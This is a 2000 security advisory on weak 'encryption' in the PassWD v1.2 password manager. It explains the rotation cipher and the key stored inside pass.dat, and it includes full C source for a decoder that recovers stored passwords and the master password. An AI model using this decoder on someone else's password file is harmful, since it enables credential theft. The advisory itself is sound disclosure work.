==[ Roe's Security Advisory # 1 (yeeha!) ]======[4th June 2000]==
Insecure encryption in PassWD v1.2
Vulnerable: PassWD v1.2 for Windows 9x, NT and 2000
Vendor: Giordano Bigarelli
Vendor location: http://web.tiscalinet.it/gbigarelli/
Advisory author: Daniel Roethlisberger <admin@roe.ch>
Advisory location: http://www.roe.ch/download/advisory001.txt
--[ Description ]------------------------------------------------
PassWD is a password managment software designed to store all
the users user and password combinations along with a site
URL. Due to the fact that PassWD is being spread by well-known
free/shareware distro sites such as tucows.com, the community
should be aware that it is very insecure.
The documentation claims that PassWD employs encryption. In
fact it uses a very weak coding that can easily be decoded.
If an attacker can get hold of the password file (usually this
will be pass.dat in PassWD's directory, which can be found in
the Registry), he can easily decode the file and thus retrieve
the user/password combinations along with the matching links,
and the master password used to `protect' the password list.
Also this is very easily exploitable by malware like password
gathering trojans.
--[ Vendor Status ]----------------------------------------------
The author of PassWD is informed. He is informing registered
users of PassWD and any distribution sites offering
PassWD v1.2 for download.
The author is not developing PassWD v1.2 anymore.
There will be no patch or update available.
Instead there is a successing product called PassWD 2000,
which will be released shortly. The author claims that it
will employ a better (real) encryption algorithm.
--[ Solution ]---------------------------------------------------
There's no real solution <sigh>.
One possible workaround is to install PassWD on an encrypted
hard disk (eg. using PGPdisk or ScramDisk).
Another is to wait for the successing product `PassWD 2000',
which should be available shortly from the developers web site
at http://web.tiscalinet.it/gbigarelli/ , which is where there
is a beta version available already. Personally, I'd be wary
of the beta version specifically and of PassWD 2000 in
general, which I think is prudent unless source code review
can verify that the product is as secure as it should be.
After changing to a more secure solution, users of PassWD v1.2
will need to securely wipe their old pass.dat file (eg. using
the secure wipe functions of PGP).
--[ Details ]----------------------------------------------------
PassWD stores all the sensitive data in a file usually called
pass.dat (this can be changed in PassWD's INI file).
Unfortunately, it not only employs a very weak encoding
algorithm, but it also hides the key in the same file.
This key is purely random, and is in no way dependant on the
master password.
The key can take a value between 1 and 99, which shows the
extreme weakness of the system. The charset consisting of 99
characters is simply rotated by <key> positions.
The below source code illustrates this. It can be used to
decode any given PassWD v1.2 `pass.dat' file to either stdout
or an output file.
--[ Exploit Source ]---------------------------------------------
/*
* Decoder for PassWD v1.2 `pass.dat' password files
*
* Written 2000 by Daniel Roethlisberger <admin@roe.ch>
*
* This code is hereby placed in the public domain.
* Use this code at your own risk for whatever you want.
*
* The decoded data is not parsed in any way - it should
* be very easy to moderately experienced programmers
* to add that themselves.
*
*/
#include <stdio.h>
void main(int argc, char *argv[])
{
unsigned char charpos;
FILE* outfile;
FILE* infile;
unsigned char a;
unsigned char b;
unsigned char key;
unsigned char x;
unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";
printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");
if((argc > 3) || (argc < 2))
{
printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
printf("If <outfile> is omitted, the output is dumped to stdout.\n", argv[0]);
return;
}
infile = fopen(argv[1], "r");
if(infile == NULL)
{
printf("Could not open file %s\n", argv[1]);
return;
}
if(argc == 2)
outfile = stdout;
else
{
outfile = fopen(argv[2], "w");
if(outfile == NULL)
{
printf("Could not write to file %s\n", argv[2]);
_fcloseall();
return;
}
}
getc(infile); /* jump over decoy byte */
a = getc(infile); /* read encoded key byte 1 */
b = getc(infile); /* read encoded key byte 2 */
if(feof(infile))
{
printf("ERROR - encountered EOF within header\n");
return;
}
/* this line `decodes' the key */
key = (unsigned char)((a - 'b') * 10 + (b - 'b'));
/* read through infile and dump decoded output to outfile: */
x = getc(infile);
while(!feof(infile))
{
for(charpos = 0; x != charset[charpos]; charpos++)
{
if(charpos > 99)
{
printf("\nERROR - encountered illegal character in source file\n");
_fcloseall();
return;
}
}
/* plain = cypher - key */
putc(charset[charpos + 99 - key], outfile);
x = getc(infile);
}
if(argc == 2)
printf("\n\n");
printf("Done.\n");
_fcloseall();
return;
}
--[ Credits/Disclaimer ]-----------------------------------------
There was no reverse engineering involved in analysing this
vulnerability, therefore this security advisory constitutes no
violation of the user license agreement.
Permission is hereby granted to copy or redistribute this
advisory, but only in its entirety.
Copyright (C) 2000 by Daniel Roethlisberger <admin@roe.ch>.
Cheers,
Dan
